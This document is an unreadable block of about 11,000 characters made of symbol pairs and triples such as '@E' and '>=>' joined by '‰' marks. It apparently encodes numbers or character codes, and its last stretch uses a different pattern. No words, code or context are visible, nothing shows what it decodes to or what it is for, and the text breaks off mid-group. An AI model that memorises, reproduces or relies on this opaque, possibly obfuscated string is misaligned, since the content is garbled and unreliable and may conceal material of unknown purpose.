@E‰@N‰@A‰@C‰@N‰@B‰@@‰@N‰@A‰@E‰@N‰@B‰@B‰@N‰@B‰@=‰@N‰@B‰@B‰@N‰@F‰@?‰@N‰@>‰@>‰@E‰@N‰@F‰@E‰@N‰@F‰@F‰@N‰@A‰@C‰@N‰@>‰@=‰@>‰@N‰@>‰@?‰@=‰@N‰@>‰@=‰@>‰@N‰@@‰@A‰@N‰@A‰@>‰@N‰@@‰@?‰@N‰@>‰@>‰@C‰@N‰@>‰@=‰@A‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@=‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@D‰@E‰@N‰@E‰@A‰@N‰@C‰@>‰@N‰@@‰@A‰@N‰@E‰@F‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@B‰@N‰@@‰@A‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@=‰@N‰@>‰@=‰@=‰@N‰@@‰@?‰@N‰@>‰@=‰@B‰@N‰@>‰@=‰@?‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@E‰@B‰@N‰@C‰@>‰@N‰@@‰@?‰@N‰@>‰@>‰@B‰@N‰@>‰@=‰@A‰@N‰@A‰@C‰@N‰@>‰@>‰@A‰@N‰@>‰@=‰@>‰@N‰@>‰@=‰@@‰@N‰@>‰@>‰@A‰@N‰@>‰@=‰@>‰@N‰@F‰@D‰@N‰@>‰@=‰@=‰@N‰@A‰@=‰@N‰@>‰@=‰@@‰@N‰@A‰@=‰@N‰@B‰@=‰@N‰@A‰@>‰@N‰@A‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@=‰@B‰@N‰@>‰@=‰@?‰@N‰@@‰@?‰@N‰@E‰@B‰@N‰@C‰@>‰@N‰@@‰@A‰@N‰@@‰@A‰@N‰@@‰@?‰@N‰@>‰@>‰@C‰@N‰@>‰@=‰@A‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@=‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@=‰@B‰@N‰@>‰@=‰@?‰@N‰@@‰@?‰@N‰@>‰@=‰@F‰@N‰@>‰@=‰@B‰@N‰@>‰@=‰@=‰@N‰@A‰@=‰@N‰@>‰@=‰@?‰@N‰@>‰@>‰@D‰@N‰@A‰@A‰@N‰@B‰@=‰@N‰@A‰@>‰@N‰@C‰@>‰@N‰@@‰@A‰@N‰@B‰@E‰@N‰@F‰@?‰@N‰@@‰@A‰@N‰@@‰@?‰@N‰@@‰@E‰@N‰@@‰@?‰@N‰@>‰@>‰@F‰@N‰@>‰@>‰@=‰@N‰@@‰@?‰@N‰@>‰@>‰@C‰@N‰@>‰@=‰@A‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@=‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@E‰@B‰@N‰@C‰@>‰@N‰@@‰@A‰@N‰@E‰@A‰@N‰@E‰@?‰@N‰@E‰@B‰@N‰@C‰@F‰@N‰@@‰@A‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@>‰@B‰@N‰@>‰@=‰@A‰@N‰@A‰@C‰@N‰@>‰@>‰@A‰@N‰@>‰@=‰@>‰@N‰@>‰@=‰@@‰@N‰@>‰@>‰@F‰@N‰@>‰@>‰@A‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@C‰@N‰@>‰@=‰@>‰@N‰@@‰@?‰@N‰@>‰@=‰@@‰@N‰@A‰@=‰@N‰@B‰@=‰@N‰@A‰@>‰@N‰@A‰@A‰@N‰@@‰@?‰@N‰@E‰@B‰@N‰@A‰@A‰@N‰@@‰@?‰@N‰@>‰@=‰@@‰@N‰@A‰@=‰@N‰@B‰@@‰@N‰@A‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@=‰@>‰@N‰@>‰@=‰@E‰@N‰@>‰@>‰@B‰@N‰@>‰@=‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@E‰@B‰@N‰@C‰@>‰@N‰@@‰@A‰@N‰@D‰@=‰@N‰@C‰@B‰@N‰@D‰@C‰@N‰@E‰@@‰@N‰@C‰@F‰@N‰@@‰@A‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@>‰@B‰@N‰@>‰@=‰@A‰@N‰@A‰@C‰@N‰@>‰@>‰@A‰@N‰@>‰@=‰@>‰@N‰@>‰@=‰@@‰@N‰@>‰@>‰@F‰@N‰@>‰@>‰@A‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@C‰@N‰@>‰@=‰@>‰@N‰@@‰@?‰@N‰@>‰@=‰@@‰@N‰@A‰@=‰@N‰@B‰@=‰@N‰@A‰@>‰@N‰@A‰@A‰@N‰@@‰@?‰@N‰@E‰@B‰@N‰@A‰@A‰@N‰@@‰@?‰@N‰@>‰@=‰@@‰@N‰@A‰@=‰@N‰@B‰@@‰@N‰@A‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@=‰@N‰@>‰@=‰@=‰@N‰@@‰@?‰@N‰@>‰@=‰@B‰@N‰@>‰@=‰@?‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@=‰@N‰@>‰@=‰@=‰@N‰@@‰@?‰@N‰@>‰@=‰@B‰@N‰@>‰@=‰@?‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@D‰@E‰@N‰@>‰@>‰@B‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@>‰@B‰@N‰@>‰@>‰@?‰@N‰@>‰@=‰@E‰@N‰@C‰@>‰@N‰@@‰@A‰@N‰@>‰@?‰@A‰@N‰@E‰@C‰@N‰@>‰@?‰@A‰@N‰@@‰@A‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@>‰@F‰@N‰@>‰@=‰@A‰@N‰@>‰@=‰@B‰@N‰@>‰@=‰@E‰@N‰@>‰@=‰@>‰@N‰@@‰@?‰@N‰@>‰@>‰@C‰@N‰@>‰@>‰@A‰@N‰@>‰@>‰@D‰@N‰@>‰@=‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@>‰@B‰@N‰@C‰@>‰@N‰@>‰@>‰@B‰@N‰@>‰@>‰@?‰@N‰@>‰@=‰@E‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@C‰@N‰@A‰@=‰@N‰@E‰@=‰@N‰@>‰@>‰@C‰@N‰@A‰@=‰@N‰@@‰@A‰@N‰@E‰@C‰@N‰@>‰@>‰@A‰@N‰@>‰@=‰@>‰@N‰@@‰@A‰@N‰@A‰@A‰@N‰@@‰@A‰@N‰@@‰@A‰@N‰@A‰@>‰@N‰@A‰@A‰@N‰@>‰@>‰@B‰@N‰@>‰@>‰@?‰@N‰@>‰@=‰@E‰@N‰@A‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@>‰@B‰@N‰@>‰@=‰@>‰@N‰@>‰@=‰@E‰@N‰@>‰@=‰@>‰@N‰@F‰@F‰@N‰@>‰@>‰@C‰@N‰@@‰@?‰@N‰@F‰@F‰@N‰@F‰@D‰@N‰@>‰@>‰@B‰@N‰@>‰@=‰@>‰@N‰@@‰@?‰@N‰@>‰@>‰@B‰@N‰@A‰@=‰@N‰@A‰@E‰@N‰@A‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@F‰@F‰@N‰@F‰@D‰@N‰@>‰@>‰@B‰@N‰@>‰@=‰@>‰@N‰@@‰@?‰@N‰@@‰@A‰@N‰@>‰@=‰@>‰@N‰@>‰@?‰@=‰@N‰@F‰@F‰@N‰@@‰@A‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@>‰@B‰@N‰@F‰@D‰@N‰@C‰@>‰@N‰@@‰@?‰@N‰@>‰@>‰@B‰@N‰@A‰@=‰@N‰@A‰@F‰@N‰@A‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@=‰@>‰@N‰@>‰@?‰@=‰@N‰@>‰@=‰@>‰@N‰@F‰@F‰@N‰@>‰@>‰@D‰@N‰@>‰@>‰@C‰@N‰@>‰@=‰@>‰@N‰@@‰@?‰@N‰@>‰@>‰@B‰@N‰@F‰@D‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@F‰@F‰@N‰@F‰@D‰@N‰@>‰@>‰@B‰@N‰@>‰@=‰@>‰@N‰@@‰@?‰@N‰@@‰@A‰@N‰@E‰@@‰@N‰@F‰@F‰@N‰@@‰@A‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@>‰@B‰@N‰@B‰@=‰@N‰@@‰@?‰@N‰@C‰@>‰@N‰@@‰@?‰@N‰@C‰@F‰@N‰@>‰@?‰@=‰@N‰@A‰@=‰@N‰@@‰@A‰@N‰@>‰@>‰@C‰@N‰@>‰@=‰@>‰@N‰@>‰@=‰@F‰@N‰@>‰@>‰@?‰@N‰@@‰@A‰@N‰@A‰@>‰@N‰@@‰@?‰@N‰@@‰@E‰@N‰@@‰@?‰@N‰@@‰@A‰@N‰@F‰@?‰@N‰@@‰@A‰@N‰@@‰@?‰@N‰@@‰@E‰@N‰@@‰@?‰@N‰@>‰@>‰@B‰@N‰@A‰@=‰@N‰@B‰@=‰@N‰@A‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@>‰@B‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@C‰@N‰@@‰@?‰@N‰@>‰@>‰@F‰@N‰@>‰@>‰@A‰@N‰@@‰@?‰@N‰@C‰@>‰@N‰@@‰@?‰@N‰@>‰@=‰@?‰@N‰@>‰@>‰@B‰@N‰@A‰@C‰@N‰@D‰@F‰@N‰@>‰@>‰@?‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@=‰@N‰@E‰@A‰@N‰@>‰@=‰@>‰@N‰@>‰@?‰@=‰@N‰@>‰@>‰@C‰@N‰@D‰@=‰@N‰@>‰@=‰@B‰@N‰@>‰@=‰@E‰@N‰@>‰@=‰@>‰@N‰@A‰@=‰@N‰@>‰@>‰@B‰@N‰@B‰@=‰@N‰@A‰@A‰@N‰@B‰@=‰@N‰@A‰@A‰@N‰@E‰@A‰@N‰@>‰@>‰@A‰@N‰@>‰@>‰@D‰@N‰@>‰@=‰@>‰@N‰@A‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@>‰@F‰@N‰@>‰@>‰@A‰@N‰@A‰@C‰@N‰@E‰@D‰@N‰@>‰@>‰@A‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@C‰@N‰@>‰@=‰@>‰@N‰@@‰@?‰@N‰@>‰@>‰@B‰@N‰@A‰@=‰@N‰@A‰@F‰@N‰@A‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@>‰@F‰@N‰@>‰@>‰@A‰@N‰@A‰@C‰@N‰@C‰@D‰@N‰@>‰@=‰@E‰@N‰@>‰@>‰@>‰@N‰@>‰@>‰@B‰@N‰@>‰@=‰@>‰@N‰@A‰@=‰@N‰@A‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@>‰@B‰@N‰@>‰@=‰@A‰@N‰@A‰@C‰@N‰@>‰@>‰@A‰@N‰@>‰@>‰@D‰@N‰@>‰@>‰@=‰@N‰@@‰@?‰@N‰@>‰@>‰@B‰@N‰@B‰@=‰@N‰@A‰@A‰@N‰@@‰@?‰@N‰@B‰@A‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@F‰@F‰@N‰@F‰@D‰@N‰@>‰@>‰@B‰@N‰@>‰@=‰@>‰@N‰@@‰@?‰@N‰@@‰@A‰@N‰@E‰@?‰@N‰@D‰@=‰@N‰@@‰@A‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@>‰@B‰@N‰@B‰@=‰@N‰@@‰@?‰@N‰@C‰@>‰@N‰@@‰@?‰@N‰@C‰@F‰@N‰@>‰@?‰@=‰@N‰@A‰@=‰@N‰@@‰@A‰@N‰@>‰@>‰@C‰@N‰@>‰@=‰@>‰@N‰@>‰@=‰@F‰@N‰@>‰@>‰@?‰@N‰@@‰@A‰@N‰@A‰@>‰@N‰@@‰@?‰@N‰@@‰@E‰@N‰@@‰@?‰@N‰@@‰@A‰@N‰@F‰@?‰@N‰@@‰@A‰@N‰@@‰@?‰@N‰@@‰@E‰@N‰@@‰@?‰@N‰@>‰@>‰@B‰@N‰@A‰@=‰@N‰@B‰@=‰@N‰@A‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@>‰@B‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@C‰@N‰@@‰@?‰@N‰@>‰@>‰@F‰@N‰@>‰@>‰@A‰@N‰@@‰@?‰@N‰@C‰@>‰@N‰@@‰@?‰@N‰@>‰@=‰@?‰@N‰@>‰@>‰@B‰@N‰@A‰@C‰@N‰@D‰@F‰@N‰@>‰@>‰@?‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@=‰@N‰@E‰@A‰@N‰@>‰@=‰@>‰@N‰@>‰@?‰@=‰@N‰@>‰@>‰@C‰@N‰@D‰@=‰@N‰@>‰@=‰@B‰@N‰@>‰@=‰@E‰@N‰@>‰@=‰@>‰@N‰@A‰@=‰@N‰@>‰@>‰@B‰@N‰@B‰@=‰@N‰@A‰@A‰@N‰@B‰@=‰@N‰@A‰@A‰@N‰@E‰@A‰@N‰@>‰@>‰@A‰@N‰@>‰@>‰@D‰@N‰@>‰@=‰@>‰@N‰@A‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@>‰@F‰@N‰@>‰@>‰@A‰@N‰@A‰@C‰@N‰@E‰@D‰@N‰@>‰@>‰@A‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@C‰@N‰@>‰@=‰@>‰@N‰@@‰@?‰@N‰@>‰@>‰@B‰@N‰@A‰@=‰@N‰@A‰@F‰@N‰@A‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@>‰@F‰@N‰@>‰@>‰@A‰@N‰@A‰@C‰@N‰@C‰@D‰@N‰@>‰@=‰@E‰@N‰@>‰@>‰@>‰@N‰@>‰@>‰@B‰@N‰@>‰@=‰@>‰@N‰@A‰@=‰@N‰@A‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@>‰@B‰@N‰@>‰@=‰@A‰@N‰@A‰@C‰@N‰@>‰@>‰@A‰@N‰@>‰@>‰@D‰@N‰@>‰@>‰@=‰@N‰@@‰@?‰@N‰@>‰@>‰@B‰@N‰@B‰@=‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@F‰@F‰@N‰@F‰@D‰@N‰@>‰@>‰@B‰@N‰@>‰@=‰@>‰@N‰@@‰@?‰@N‰@@‰@A‰@N‰@E‰@?‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@=‰@N‰@@‰@A‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@>‰@B‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@C‰@N‰@@‰@?‰@N‰@>‰@>‰@F‰@N‰@>‰@>‰@A‰@N‰@@‰@?‰@N‰@C‰@>‰@N‰@@‰@?‰@N‰@>‰@=‰@?‰@N‰@>‰@>‰@B‰@N‰@A‰@C‰@N‰@D‰@F‰@N‰@>‰@>‰@?‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@=‰@N‰@E‰@A‰@N‰@>‰@=‰@>‰@N‰@>‰@?‰@=‰@N‰@>‰@>‰@C‰@N‰@D‰@=‰@N‰@>‰@=‰@B‰@N‰@>‰@=‰@E‰@N‰@>‰@=‰@>‰@N‰@A‰@=‰@N‰@>‰@=‰@?‰@N‰@>‰@>‰@D‰@N‰@A‰@A‰@N‰@A‰@F‰@N‰@A‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@=‰@?‰@N‰@@‰@?‰@N‰@C‰@>‰@N‰@@‰@?‰@N‰@>‰@>‰@F‰@N‰@>‰@>‰@A‰@N‰@A‰@C‰@N‰@E‰@?‰@N‰@>‰@=‰@>‰@N‰@F‰@D‰@N‰@>‰@=‰@=‰@N‰@C‰@B‰@N‰@>‰@=‰@E‰@N‰@>‰@=‰@E‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@>‰@F‰@N‰@>‰@>‰@A‰@N‰@A‰@C‰@N‰@F‰@F‰@N‰@>‰@=‰@E‰@N‰@>‰@>‰@>‰@N‰@>‰@>‰@B‰@N‰@>‰@=‰@>‰@N‰@A‰@=‰@N‰@A‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@=‰@?‰@N‰@@‰@?‰@N‰@C‰@>‰@N‰@@‰@?‰@N‰@>‰@>‰@A‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@?‰@N‰@>‰@=‰@E‰@N‰@F‰@D‰@N‰@F‰@F‰@N‰@>‰@=‰@>‰@N‰@A‰@=‰@N‰@>‰@=‰@?‰@N‰@A‰@A‰@N‰@F‰@F‰@N‰@>‰@=‰@A‰@N‰@@‰@E‰@N‰@>‰@>‰@E‰@N‰@>‰@>‰@=‰@N‰@@‰@E‰@N‰@F‰@F‰@N‰@>‰@=‰@A‰@N‰@A‰@A‰@N‰@F‰@F‰@N‰@>‰@=‰@A‰@N‰@@‰@E‰@N‰@>‰@>‰@B‰@N‰@A‰@=‰@N‰@A‰@F‰@N‰@A‰@>‰@N‰@@‰@E‰@N‰@F‰@F‰@N‰@>‰@=‰@A‰@N‰@A‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@>‰@B‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@C‰@N‰@@‰@?‰@N‰@>‰@>‰@F‰@N‰@>‰@>‰@A‰@N‰@@‰@?‰@N‰@C‰@>‰@N‰@@‰@?‰@N‰@>‰@=‰@?‰@N‰@>‰@>‰@B‰@N‰@A‰@C‰@N‰@D‰@F‰@N‰@>‰@>‰@?‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@=‰@N‰@E‰@A‰@N‰@>‰@=‰@>‰@N‰@>‰@?‰@=‰@N‰@>‰@>‰@C‰@N‰@D‰@=‰@N‰@>‰@=‰@B‰@N‰@>‰@=‰@E‰@N‰@>‰@=‰@>‰@N‰@A‰@=‰@N‰@>‰@=‰@?‰@N‰@>‰@>‰@D‰@N‰@A‰@A‰@N‰@B‰@=‰@N‰@A‰@A‰@N‰@>‰@=‰@?‰@N‰@F‰@D‰@N‰@>‰@=‰@E‰@N‰@>‰@>‰@B‰@N‰@>‰@=‰@>‰@N‰@A‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@>‰@F‰@N‰@>‰@>‰@A‰@N‰@A‰@C‰@N‰@E‰@D‰@N‰@>‰@>‰@A‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@C‰@N‰@>‰@=‰@>‰@N‰@@‰@?‰@N‰@>‰@=‰@?‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@>‰@F‰@N‰@>‰@>‰@A‰@N‰@A‰@C‰@N‰@F‰@F‰@N‰@>‰@=‰@E‰@N‰@>‰@>‰@>‰@N‰@>‰@>‰@B‰@N‰@>‰@=‰@>‰@N‰@A‰@=‰@N‰@A‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@F‰@F‰@N‰@F‰@D‰@N‰@>‰@>‰@B‰@N‰@>‰@=‰@>‰@N‰@@‰@?‰@N‰@@‰@A‰@N‰@E‰@B‰@N‰@>‰@>‰@?‰@N‰@@‰@A‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@>‰@B‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@C‰@N‰@@‰@?‰@N‰@>‰@>‰@F‰@N‰@>‰@>‰@A‰@N‰@@‰@?‰@N‰@C‰@>‰@N‰@@‰@?‰@N‰@>‰@=‰@?‰@N‰@>‰@>‰@B‰@N‰@A‰@C‰@N‰@D‰@F‰@N‰@>‰@>‰@?‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@=‰@N‰@E‰@A‰@N‰@>‰@=‰@>‰@N‰@>‰@?‰@=‰@N‰@>‰@>‰@C‰@N‰@D‰@=‰@N‰@>‰@=‰@B‰@N‰@>‰@=‰@E‰@N‰@>‰@=‰@>‰@N‰@A‰@=‰@N‰@>‰@=‰@?‰@N‰@>‰@>‰@D‰@N‰@A‰@A‰@N‰@B‰@=‰@N‰@A‰@A‰@N‰@>‰@=‰@?‰@N‰@F‰@D‰@N‰@>‰@=‰@E‰@N‰@>‰@>‰@B‰@N‰@>‰@=‰@>‰@N‰@A‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@>‰@B‰@N‰@A‰@=‰@N‰@A‰@F‰@N‰@A‰@>‰@N‰@@‰@?‰@N‰@C‰@>‰@N‰@@‰@?‰@N‰@>‰@>‰@A‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@?‰@N‰@>‰@=‰@E‰@N‰@F‰@D‰@N‰@F‰@F‰@N‰@>‰@=‰@>‰@N‰@A‰@=‰@N‰@>‰@>‰@B‰@N‰@A‰@=‰@N‰@A‰@F‰@N‰@A‰@>‰@N‰@A‰@A‰@N‰@@‰@A‰@N‰@>‰@?‰@A‰@N‰@E‰@B‰@N‰@>‰@?‰@A‰@N‰@@‰@A‰@N‰@A‰@A‰@N‰@@‰@A‰@N‰@>‰@?‰@A‰@N‰@E‰@C‰@N‰@>‰@?‰@A‰@N‰@@‰@A‰@N‰@A‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@>‰@F‰@N‰@>‰@>‰@A‰@N‰@A‰@C‰@N‰@E‰@D‰@N‰@>‰@>‰@A‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@C‰@N‰@>‰@=‰@>‰@N‰@@‰@?‰@N‰@>‰@>‰@B‰@N‰@A‰@=‰@N‰@A‰@F‰@N‰@A‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@>‰@F‰@N‰@>‰@>‰@A‰@N‰@A‰@C‰@N‰@C‰@D‰@N‰@>‰@=‰@E‰@N‰@>‰@>‰@>‰@N‰@>‰@>‰@B‰@N‰@>‰@=‰@>‰@N‰@A‰@=‰@N‰@A‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@>‰@B‰@N‰@>‰@=‰@A‰@N‰@A‰@C‰@N‰@>‰@>‰@A‰@N‰@>‰@>‰@D‰@N‰@>‰@>‰@=‰@N‰@@‰@?‰@N‰@@‰@A‰@N‰@>‰@>‰@F‰@N‰@>‰@>‰@B‰@N‰@F‰@F‰@N‰@>‰@>‰@A‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@?‰@N‰@>‰@>‰@C‰@N‰@A‰@C‰@N‰@>‰@=‰@>‰@N‰@>‰@?‰@=‰@N‰@>‰@=‰@>‰@N‰@@‰@?‰@N‰@A‰@D‰@N‰@A‰@D‰@N‰@C‰@C‰@N‰@@‰@?‰@N‰@@‰@A‰@N‰@@‰@?‰@N‰@@‰@E‰@N‰@@‰@?‰@N‰@F‰@F‰@N‰@>‰@=‰@A‰@N‰@@‰@?‰@N‰@@‰@E‰@N‰@@‰@?‰@N‰@>‰@=‰@?‰@N‰@>‰@>‰@D‰@N‰@@‰@?‰@N‰@@‰@E‰@N‰@@‰@?‰@N‰@F‰@F‰@N‰@>‰@=‰@A‰@N‰@A‰@A‰@N‰@@‰@?‰@N‰@B‰@A‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@>‰@F‰@N‰@A‰@C‰@N‰@>‰@>‰@@‰@N‰@>‰@>‰@D‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@C‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@F‰@F‰@N‰@F‰@D‰@N‰@>‰@>‰@B‰@N‰@>‰@=‰@>‰@N‰@@‰@?‰@N‰@@‰@A‰@N‰@C‰@D‰@N‰@>‰@=‰@E‰@N‰@@‰@A‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@E‰@D‰@N‰@A‰@C‰@N‰@>‰@>‰@@‰@N‰@>‰@>‰@D‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@C‰@N‰@@‰@?‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@F‰@F‰@N‰@F‰@D‰@N‰@>‰@>‰@B‰@N‰@>‰@=‰@>‰@N‰@@‰@?‰@N‰@@‰@A‰@N‰@E‰@B‰@N‰@>‰@>‰@=‰@N‰@@‰@A‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@E‰@@‰@N‰@A‰@=‰@N‰@A‰@F‰@N‰@A‰@>‰@N‰@@‰@?‰@N‰@C‰@>‰@N‰@@‰@?‰@N‰@>‰@>‰@A‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@?‰@N‰@>‰@=‰@E‰@N‰@F‰@D‰@N‰@F‰@F‰@N‰@>‰@=‰@>‰@N‰@A‰@=‰@N‰@E‰@@‰@N‰@A‰@=‰@N‰@A‰@F‰@N‰@A‰@>‰@N‰@A‰@A‰@N‰@@‰@A‰@N‰@@‰@D‰@N‰@>‰@=‰@?‰@N‰@@‰@A‰@N‰@A‰@A‰@N‰@>‰@=‰@?‰@N‰@>‰@>‰@D‰@N‰@A‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@E‰@@‰@N‰@A‰@=‰@N‰@A‰@F‰@N‰@A‰@>‰@N‰@@‰@?‰@N‰@C‰@>‰@N‰@@‰@?‰@N‰@>‰@>‰@A‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@?‰@N‰@>‰@=‰@E‰@N‰@F‰@D‰@N‰@F‰@F‰@N‰@>‰@=‰@>‰@N‰@A‰@=‰@N‰@E‰@@‰@N‰@A‰@=‰@N‰@A‰@F‰@N‰@A‰@>‰@N‰@A‰@A‰@N‰@@‰@A‰@N‰@@‰@D‰@N‰@>‰@>‰@=‰@N‰@@‰@A‰@N‰@A‰@A‰@N‰@>‰@>‰@F‰@N‰@>‰@>‰@=‰@N‰@A‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@E‰@@‰@N‰@A‰@=‰@N‰@A‰@F‰@N‰@A‰@>‰@N‰@@‰@?‰@N‰@C‰@>‰@N‰@@‰@?‰@N‰@>‰@>‰@A‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@?‰@N‰@>‰@=‰@E‰@N‰@F‰@D‰@N‰@F‰@F‰@N‰@>‰@=‰@>‰@N‰@A‰@=‰@N‰@E‰@@‰@N‰@A‰@=‰@N‰@A‰@F‰@N‰@A‰@>‰@N‰@A‰@A‰@N‰@@‰@A‰@N‰@@‰@D‰@N‰@>‰@>‰@B‰@N‰@>‰@=‰@?‰@N‰@>‰@=‰@=‰@N‰@>‰@>‰@A‰@N‰@@‰@A‰@N‰@A‰@A‰@N‰@>‰@=‰@=‰@N‰@>‰@>‰@A‰@N‰@A‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@=‰@>‰@N‰@>‰@?‰@=‰@N‰@>‰@=‰@>‰@N‰@F‰@F‰@N‰@>‰@>‰@D‰@N‰@>‰@>‰@C‰@N‰@>‰@=‰@>‰@N‰@@‰@?‰@N‰@E‰@@‰@N‰@A‰@=‰@N‰@A‰@F‰@N‰@A‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@>‰@F‰@N‰@A‰@C‰@N‰@>‰@>‰@@‰@N‰@>‰@>‰@D‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@C‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@=‰@N‰@>‰@=‰@=‰@N‰@@‰@?‰@N‰@>‰@>‰@B‰@N‰@>‰@=‰@>‰@N‰@>‰@=‰@E‰@N‰@>‰@=‰@>‰@N‰@F‰@F‰@N‰@>‰@>‰@C‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@E‰@D‰@N‰@A‰@C‰@N‰@E‰@@‰@N‰@>‰@=‰@E‰@N‰@>‰@=‰@>‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@?‰@N‰@@‰@?‰@N‰@B‰@A‰@N‰@A‰@E‰@N‰@A‰@E‰@N‰@A‰@E‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@>‰@F‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@=‰@N‰@>‰@=‰@=‰@N‰??‰Q‰N‰CA‰CF‰CQ‰?=‰BF‰BC‰AS‰DE‰C>‰B>‰DA‰CA‰AR‰DN‰A?‰AE‰AA‰BF‰BB‰BF‰AQ‰AF‰B?‰BN‰AB‰DA‰D>‰DE‰AB‰Q‰N‰BF‰BC‰AS‰DE‰C>‰B>‰DA‰CA‰AR‰DN‰A?‰AE‰AA‰BF‰BB‰BF‰AQ‰AF‰B?‰BN‰AB‰DA‰D>‰DE‰AB‰?=‰@Q‰?=‰??‰@N‰??‰Q‰N‰AS‰D>‰AF‰CD‰A@‰B>‰CD‰DA‰CD‰B=‰AN‰DN‰AD‰CP‰BF‰BD‰DA‰AN‰BN‰D>‰C?‰BN‰AR‰CE‰B=‰@Q‰B@‰B=‰AP‰AF‰BA‰?E‰AS‰D>‰AF‰CD‰A@‰B>‰CD‰DA‰CD‰B=‰AN‰DN‰AD‰CP‰BF‰BD‰DA‰AN‰BN‰D>‰C?‰BN‰AR‰CE‰B=‰?P‰?=‰BF‰BC‰AS‰D